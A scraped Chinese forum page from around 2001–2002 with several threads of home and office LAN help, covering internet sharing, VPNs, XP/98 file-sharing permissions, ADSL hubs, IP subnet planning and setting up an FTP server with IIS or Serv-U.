追风男孩Kevin 初级用户 积分：0 发帖：2 来自：太平洋西海岸 注册：2001-12-10 | 发表于 2001-12-10 09:53:41 按此观看追风男孩Kevin的个人资料 按此发邮件给追风男孩Kevin 追风男孩Kevin 的 oicq 是48780950,查看 48780950 的资料 发送悄悄话给追风男孩Kevin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看追风男孩Kevin的IP 首先非常感谢您的帮忙，方法我尝试过，可是分机不能浏览访问！ Internet Explorer里“连接”---“局域网设置”里还需要设置些什么吗？？ 我不完美，可是我很自信。我不英俊，可是我很潇洒； 我不富有，可是我很快乐，我不成功，可是我很认真； 我不多情，可是我懂得珍惜。这就是我，一个快活的人。
上一贴 | 下一贴
快速回复 | 主题：为什么家庭两机共享总是设置不好
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于局域网维护的资料

计算机技术
关于局域网维护的资料

上一贴 | 下一贴
发表人 | 主题: 关于局域网维护的资料
sgilb 高级用户 积分：187 发帖：76 来自： 注册：2001-09-16 | 发表于 2001-12-12 19:18:06 按此观看sgilb的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给sgilb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sgilb的IP 我想在网上找点局域网方面的资料,有人知道请告之,万分感谢! 或者推荐书也行. 当我看你时-----------你是一切! 当我看一切时---------一切是你!
教主 初级用户 积分：7 发帖：6 来自：广东省广州市 注册：2001-12-01 | 发表于 2001-12-12 21:49:39 按此观看教主的个人资料 按此发邮件给教主 访问教主的主页 教主 的 oicq 是24910506,查看 24910506 的资料 发送悄悄话给教主 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看教主的IP 由《微型计算机》杂志社总编的、海洋出版社出版的《局域网一点通》系列是非常不错一的一本书，提供办公室、家庭、网吧、宿舍组网实务操作方法。 赶工者
上一贴 | 下一贴
快速回复 | 主题：关于局域网维护的资料
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


一个关于网络的菜问题，请教！！！

计算机技术
一个关于网络的菜问题，请教！！！

上一贴 | 下一贴
发表人 主题: 一个关于网络的菜问题，请教！！！
yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-12 11:44:36 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
访问远端的局域网的方法有多少？如果不通过INTERNET，是不是要有自己的专线，或者租电信或别人的线路？？？？？？？？？

？？？？？？？？？？？？？！！！！！！！！！！！！！！
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-12 12:30:01 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
现在好象有一种公司专门远程管理的服务，一个月才几百块钱，你可以到你当地的isp那里问下

WINDFLASH
::浅紫色FORUM::
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-12 13:26:19 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
VPN（虚拟局域网），通过internet访问

等我想想再签
yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-12 14:06:41 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
为了安全起见，想不通过INTERNET，可有什么方法？？

？？？？？？？？？？？？？！！！！！！！！！！！！！！
教主

初级用户
积分：7
发帖：6
来自：广东省广州市
注册：2001-12-01
 发表于 2001-12-12 22:07:55 按此观看教主的个人资料 按此发邮件给教主 访问教主的主页 教主 的 oicq 是24910506,查看 24910506 的资料 发送悄悄话给教主 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看教主的IP
用pcanywhere试一下

赶工者
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-12 23:24:49 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
教主在上个帖子中说
引用:
用pcanywhere试一下

这个是黑客软件。。

VPN（虚拟局域网），通过internet访问 这个是可行的，我说的好象是这个，安全是有保障的！！！

WINDFLASH
::浅紫色FORUM::
yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-13 11:49:22 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
那位大侠能介绍以下VPN，或者给个地址我去看看！！THANKS！！！！

？？？？？？？？？？？？？！！！！！！！！！！！！！！
嘿嘿

坏笑
积分：403
发帖：525
来自：
注册：2001-10-06
 发表于 2001-12-13 15:24:15 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
yixinguy78在上个帖子中说
引用:
那位大侠能介绍以下VPN，或者给个地址我去看看！！THANKS！！！！

虚拟专用网络 (VPN) 是专用网络的延伸，它包含了类似 Internet 的共享或公共网络链接。通过 VPN 可以以模拟点对点专用链接的方式通过共享或公共网络在两台计算机之间发送数据。虚拟专用联网是创建和配置虚拟专用网络的行为。

VPN技术详解
http://mm.net.hnpts.ha.cn/dmt/kuang4.htm

什么是虚拟专用网(VPN)
http://rednet.eschool.com.cn/document/20010302/2001030211311501.shtml

Win2000配置VPN的简单实例
http://www.etechnic.com.cn/document/20010827/2001082710572401.shtml

缘是天定,份在人为.
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-13 15:41:35 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
yixinguy78在上个帖子中说
引用:
为了安全起见，想不通过INTERNET，可有什么方法？？

办法是有，不过钱花多了，不过实在有钱也可以，去问问银行就知道了

等我想想再签
yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-14 10:06:42 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
嘿嘿在上个帖子中说
引用:
yixinguy78在上个帖子中说
引用:
那位大侠能介绍以下VPN，或者给个地址我去看看！！THANKS！！！！

虚拟专用网络 (VPN) 是专用网络的延伸，它包含了类似 Internet 的共享或公共网络链接。通过 VPN 可以以模拟点对点专用链接的方式通过共享或公共网络在两台计算机之间发送数据。虚拟专用联网是创建和配置虚拟专用网络的行为。

VPN技术详解
http://mm.net.hnpts.ha.cn/dmt/kuang4.htm

什么是虚拟专用网(VPN)
http://rednet.eschool.com.cn/document/20010302/2001030211311501.shtml

Win2000配置VPN的简单实例
http://www.etechnic.com.cn/document/20010827/2001082710572401.shtml

谢谢！！！！！VERY谢谢！！！！要是有更位详细的介绍网站，那就更好了！！！我是不是太过分了！！！！！！！！！！！！！！

？？？？？？？？？？？？？！！！！！！！！！！！！！！
上一贴 | 下一贴
快速回复 | 主题：一个关于网络的菜问题，请教！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


局域网中XP无法访问的问题？？？？

计算机技术
局域网中XP无法访问的问题？？？？

上一贴 | 下一贴
发表人 | 主题: 局域网中XP无法访问的问题？？？？
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2001-12-13 11:57:34 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 局域网中有几台机器装的是XP，有的是98，现在我无法访问另一个XP机器，可提示“没有访问的权限”，访问98要提工密码？？？？？？ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
caience 冬天是红色 积分：2644 发帖：2438 来自：小城淄博 注册：2000-10-20 | 发表于 2001-12-13 12:38:00 按此观看caience的个人资料 按此发邮件给caience 访问caience的主页 发送悄悄话给caience 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看caience的IP 没有密码的话你俺确定试试了吗？~~~ 对了，xp怎么连不到局域网的组或者域？ GUOGUO & MUMU =NICEMOOD= CS team awper: caience
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2001-12-13 13:28:53 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 我在局域网中能看到对方的共享文件，但我要在它的磁盘上操作时说没有这个权限（只读），有的根本看不到共享文件，98系统能看到共享文件，但双击时要密码才能访问，以前可以访问，最近因为XP添加了几个用户，改了计算机管理员的密码（不是administator） ？？？？？？？？？？？？？！！！！！！！！！！！！！！
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2001-12-13 13:53:10 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 对不起，更正一下上面的话，XP的机器可以访问98，98访问XP要密码，XP不能相互访问，快点救我，否则我会死的！！！！！！！！！！！！！！！！！！！！！ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
BIGBUG 终级用户 积分：1095 发帖：720 来自：不一定 注册：2001-03-21 | 发表于 2001-12-13 15:31:22 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP 启用XP的guest帐户试试（控制面板——计算机管理——用户和组——用户） to caience：XP绝对可以连进组和域，具体看看你的设置 [这消息被BIGBUG编辑过(编辑时间2001-12-13 15:31:07)] 等我想想再签
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2001-12-14 11:06:44 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 现在好了，我没有设置网络连接，真乃“天下苯者，舍我其谁”！！！！！！！！ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
上一贴 | 下一贴
快速回复 | 主题：局域网中XP无法访问的问题？？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


adsl怎么一个端口几台机共享？

计算机技术
adsl怎么一个端口几台机共享？

上一贴 | 下一贴
发表人 | 主题: adsl怎么一个端口几台机共享？
bb 初级用户 积分：78 发帖：34 来自： 注册：2001-06-07 | 发表于 2001-12-16 00:01:35 按此观看bb的个人资料 按此发邮件给bb 收藏该主题供以后查看 发送悄悄话给bb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bb的IP 知道的请详细讲讲设置 THX
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-16 13:54:02 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 首先你的Modem必须是连接网卡类型的 带简单Router（路由）功能的 不能是USB接口的 也就是说整个过程应该是： ADSL线>Modem>网卡 这样你就可以用一个小Hub（集线器） 进行这样的连接 ADSL线>Modem>Hub(Uplink口) 然后其他的电脑就可以连接到Hub的其他接口上了 这种连接方式最简单也最方便 几台电脑互相之间不影响 如果你使用USB接口的Modem 就需要把其中一台电脑作为服务器 并且在服务器上共享Internet连接 然后用网卡把服务器连接到Hub的Uplink口 其他电脑才能够上网 这样的连接很麻烦 服务器必须一直开着 若是这样强烈建议你换一个Modem 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 | 主题：adsl怎么一个端口几台机共享？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于adsl的局域网设置问题

计算机技术
关于adsl的局域网设置问题

上一贴 | 下一贴
发表人 | 主题: 关于adsl的局域网设置问题
苦咖啡 终级用户 积分：561 发帖：260 来自： 注册：2001-02-04 | 发表于 2001-12-26 10:13:05 按此观看苦咖啡的个人资料 按此发邮件给苦咖啡 访问苦咖啡的主页 苦咖啡 的 oicq 是120190907,查看 120190907 的资料 收藏该主题供以后查看 发送悄悄话给苦咖啡 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看苦咖啡的IP 公司里装了adsl，连接方法是进线接到adsl猫上，猫接到主机的第一块网卡上，主机的第一块网卡接到Hub，在接到其他电脑，现在的问题是很多网站访问不了,例如geway.com 21bobn.com sina等等，但是我家里的adsl可以上的，同城市其他网络公司也没有这样的情况，请问会是什么原因，我现在msn qq mirc都可以上，就是一些网站不能访问
AirTree 超级用户 积分：375 发帖：229 来自：帝国时代 注册：2001-12-07 | 发表于 2001-12-26 11:20:13 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP 我的情况和你一样，这个问题我已经在前几天发过了帖子，不过到现在还是没有回答，看来我们需要再努力寻找下去！ 如果你有了答案，给我一份，谢谢！ 打雷了！下雨了！大家快回家收衣服啊……
大哥 超级用户 积分：318 发帖：111 来自： 注册：2001-12-20 | 发表于 2001-12-26 11:20:35 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 大概是DNS服务器设置问题，QQ、MIRC等是直接使用IP地址访问的，因此可以上。 测试方法： ping www.sina.com 如果无法解析出IP地址，那么确定是DNS问题。 老哥我知道的就这么多了。
AirTree 超级用户 积分：375 发帖：229 来自：帝国时代 注册：2001-12-07 | 发表于 2001-12-26 11:33:46 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP 绝对不是DNS的配置问题，这点我可以保证！！ http://www.blueidea.com/bbs/newsdetail.asp?id=326613 那里的讨论没有任何进展，可以去看看！ 打雷了！下雨了！大家快回家收衣服啊……
苦咖啡 终级用户 积分：561 发帖：260 来自： 注册：2001-02-04 | 发表于 2001-12-26 14:45:10 按此观看苦咖啡的个人资料 按此发邮件给苦咖啡 访问苦咖啡的主页 苦咖啡 的 oicq 是120190907,查看 120190907 的资料 发送悄悄话给苦咖啡 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看苦咖啡的IP http://bbs.et8.net/bbs/showthread.php?s=&threadid=77707 你们看看 解决了
上一贴 | 下一贴
快速回复 | 主题：关于adsl的局域网设置问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


局域网的问题？？？？？？

计算机技术
局域网的问题？？？？？？

上一贴 | 下一贴
发表人 | 主题: 局域网的问题？？？？？？
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2002-01-04 14:21:26 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 局域网中有350台机器，我分配IP时如何做，可不可以这样，子网掩码为192.168.0.0， 下边工作站IP为192.168.0.1~192.168.0.100 ，192.168.1.1~192.168.1.100，192.168.2.1~192.168.2.150，这样行不行？？？？？？ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
wx@ay 看不懂 积分：7349 发帖：5076 来自：ay.ha.cn 注册：1999-12-23 | 发表于 2002-01-04 16:11:13 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 子网掩码192.168.0.0？？ 建议子网掩码设为 255.255.255.224 192.168.0.1最好保留不用。 Think like a Genius. 忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你
BIGBUG 终级用户 积分：1095 发帖：720 来自：不一定 注册：2001-03-21 | 发表于 2002-01-04 16:48:24 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP 350台的话不建议使用192.168.0.～ IP段，因为你只能配置254台（子网掩码255.255.255.0） 建议使用子网掩码为255.255.0.0的IP段 等我想想再签
上一贴 | 下一贴
快速回复 | 主题：局域网的问题？？？？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于 局域网的问题，虚拟服务器，请进！！！

计算机技术
关于 局域网的问题，虚拟服务器，请进！！！

上一贴 | 下一贴
发表人 | 主题: 关于 局域网的问题，虚拟服务器，请进！！！
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2002-01-11 09:57:56 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 在一个局域网中要由多个虚拟服务器，入（FTP，WWW，VPN等），可以在一台服务器实现吗，还是一台服务器只能配一个虚拟服务器，那里有相关的资料吗？ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
flashdev 初级用户 积分：29 发帖：14 来自： 注册：2001-12-13 | 发表于 2002-01-11 13:01:27 按此观看flashdev的个人资料 按此发邮件给flashdev 发送悄悄话给flashdev 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flashdev的IP 可以在一台服务器中实现www、Ftp、Mail等服务，win2k中我就实现了。相关资料吗，自己到网上搜索一下，我手头也没有。 好好学习，天天向上！
樱 终级用户 积分：1308 发帖：401 来自：▓★☆★☆★▓ 注册：2000-12-11 | 发表于 2002-01-11 13:46:38 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP 可以在一台服务器上实现 装个proxy server吧 18J [w]
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2002-01-11 16:49:57 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP very thanks ？？？？？？？？？？？？？！！！！！！！！！！！！！！
上一贴 | 下一贴
快速回复 | 主题：关于 局域网的问题，虚拟服务器，请进！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有什么工具能够 抓下超出一屏的页面。。。

计算机技术
有什么工具能够 抓下超出一屏的页面。。。

上一贴 | 下一贴
发表人 主题: 有什么工具能够 抓下超出一屏的页面。。。
birdbird

初级用户
积分：110
发帖：38
来自：
注册：2001-12-06
 发表于 2001-12-17 10:15:26 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP
一般的抓图工具只能抓下最多全屏的图片，如果页面出现滚屏，用什么工具能够把整个页面截下来。

我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
ADSL

终级用户
积分：2969
发帖：668
来自：贫困山区
注册：2001-03-06
 发表于 2001-12-17 11:37:55 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
HyperSnap-DX 4

好好学习，努力做事
birdbird

初级用户
积分：110
发帖：38
来自：
注册：2001-12-06
 发表于 2001-12-17 13:51:20 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP
我试过的，HyperSnap-DX 4也只能抓一屏之内的东西，若页面超出了一屏的长度，就不行了。
这个问题长久以来困扰着我，一直没有找到答案，真的没有解决办法 吗？

我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
tntst

高级用户
积分：233
发帖：184
来自：广州
注册：2000-07-23
 发表于 2001-12-17 13:58:13 按此观看tntst的个人资料 按此发邮件给tntst tntst 的 oicq 是10406476,查看 10406476 的资料 发送悄悄话给tntst 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tntst的IP
hypersnap

Capture－＞Capture Settings，在Auto Scroll...之前打上勾！

***>> TNTST <<***
-----------------------------------
投稿信箱：tntst@pconline.com.cn
网址： http://www.pconline.com.cn/pcedu
MM MX：[url]http://www.pconline.com.cn/pcedu/redian/mx/[
birdbird

初级用户
积分：110
发帖：38
来自：
注册：2001-12-06
 发表于 2001-12-17 14:58:55 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP
OK!
太感谢了!
还是好人多啊，我好感动，55555......

我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
上一贴 | 下一贴
快速回复 | 主题：有什么工具能够 抓下超出一屏的页面。。。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何在局域网里架设自己的ftp服务器？

计算机技术
如何在局域网里架设自己的ftp服务器？

上一贴 | 下一贴
发表人 主题: 如何在局域网里架设自己的ftp服务器？
hedgehog

终级用户
积分：829
发帖：370
来自：
注册：2000-08-24
 发表于 2002-01-06 14:40:09 按此观看hedgehog的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给hedgehog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hedgehog的IP
所有电脑都通过服务器上网，服务器有固定IP。

用哪个软件可以开ftp？我用的是serve-u 3.0这个软件，好像有些问题。

什么是爱情？给我一次体验的机会...
凌志

终级用户
积分：532
发帖：163
来自：鞍山
注册：2001-01-09
 发表于 2002-01-06 14:41:57 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
推荐Win2000 Server中的IIS 5.0！

网络天下
四海一家
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-06 15:33:25 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
如果你的机器只分配了内部ip，如 192.xxx.xxx.xxx 之类的，就不行了。
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-06 16:51:19 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
要求不高的话，就iis吧
servr-u不要用汉化版本的

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2002-01-06 17:12:07 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
做下载,还是做上传呀,要是做上传的话,IIS可不怎么好用,做下载的话,还不如用HTTP

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2002-01-06 18:16:14 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
当然用serve-u,转帖一个给你看:

首先你必须具备的条件：
1：你必须具有网管权限
2：主服务器操作系统是WIN2K。
下载一个FTP服务端软件，FTP serv-u(本机上如果装了ＩＩＳ也可以），完成安装。
下面是在服务器（也就是局域网代理服务器）上要做的工作，以保证你的ＦＴＰ可以对外服务。
一,建产ＤＮＳ记录
1、打开DNS控制台：选“开始菜单→程序→管理工具→DNS”。
２，建立域名“ftp.dasha.com”映射IP地址“192.168.0.50”(这个ＩＰ就是客户端的真
  正ＩＰ）的主机记录。
①建立“com”区域：选“DNS→WY（你的服务器名）→正向搜索区域→右键→新建区域”，然后根据提示选“标准主要区域”、在“名称”处输入“com“
②建立“dasha”域：选“com→右键→新建域”，在“键入新域名”处输入“dasha”
③建立“ftp”主机。选“dasha→右键→新建主机”，“名称”处为“ftp”，“IP地址”处输入“192.168.0.50”，再按“添加主机”。
现在测试一下，“运行”输入"ping ftp.dasha.com"
二、“ftp.abc.com”的设置
1、打开“默认FTP站点”属性窗口：选“默认FTP站点→右键→属性”即可。
2、设置“FTP站点”：在“IP地址”处选“192.168.0.50”，端口号保持默认值“21”不变。
3、设置“消息”：在“欢迎”框中输入登录成功后的欢迎信息，“退出”中为退出信息。
4、设置“主目录”：在“客户机”中按“浏览”按钮选择目标目录“E:\myweb”。
5、设置“安全帐号”：默认的，匿名用户（Anonymous）被允许登录，如果有必要，此处可选拒绝其登录以增加安全性；或增加其他用于管理此FTP服务器的用户名（默认的为“Administator”）。
6、设置“目录安全性”：此处可以设置只被允许或只被拒绝登录此FTP服务器的的计算机的IP地址。
7、如需要，也可在“默认FTP站点”处单击右键选“新建”来新建FTP的虚拟目录。
三、“ftp.dasha.com”的测试
